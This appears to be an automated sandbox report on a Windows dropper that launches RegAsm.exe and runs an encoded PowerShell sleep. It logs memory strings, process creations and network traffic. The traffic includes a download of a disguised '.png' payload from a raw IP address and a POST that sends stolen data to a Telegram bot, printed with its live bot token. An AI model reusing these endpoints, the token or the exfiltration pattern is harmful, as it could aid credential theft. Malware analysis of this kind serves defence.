                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.503779743.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocumentH
                    Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocumentP
                    Source: RegAsm.exe, 00000010.00000002.639930266.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botH
                    Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org48k
                    Source: tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/novotnyllc/bc-csharp
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: RegAsm.exe, 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vectorstealer.com
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                    Source: RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                    Source: unknownHTTP traffic detected: POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e749d4e4-749a-41ce-b152-70d8d1eceec1"Host: api.telegram.orgContent-Length: 2227Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /Fppsmppzh.png HTTP/1.1Host: 41.216.183.235Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Fppsmppzh.png HTTP/1.1Host: 41.216.183.235Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Fppsmppzh.png HTTP/1.1Host: 41.216.183.235Connection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.501718718.0000000000F70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_01201BB8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_08D3B8C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_08D3D230
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_08D3A678
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_08D369B8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_08D3A39A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_08D3A316
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_08D3A668
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012E0B38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012E13C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012ED220
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012EC201
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012E3E40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012EA328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012E0B28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012EA31A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012E13B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012EAA38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012EAA48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012E4740
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_012E3E30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_05284D68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_05280C68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_052881F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_05280C58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0528A4E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0528A4F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_052819A1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_052819B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_052881E2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess Stats: CPU usage > 98%
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.500391036.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.571519401.0000000007C95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePayload.exe* vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000000.248009549.00000000008E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePAGOS.exe" vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.580509786.0000000007DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.580509786.0000000007DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.501718718.0000000000F70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeBinary or memory string: OriginalFilenamePAGOS.exe" vs SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeVirustotal: Detection: 22%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeJump to behavior
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
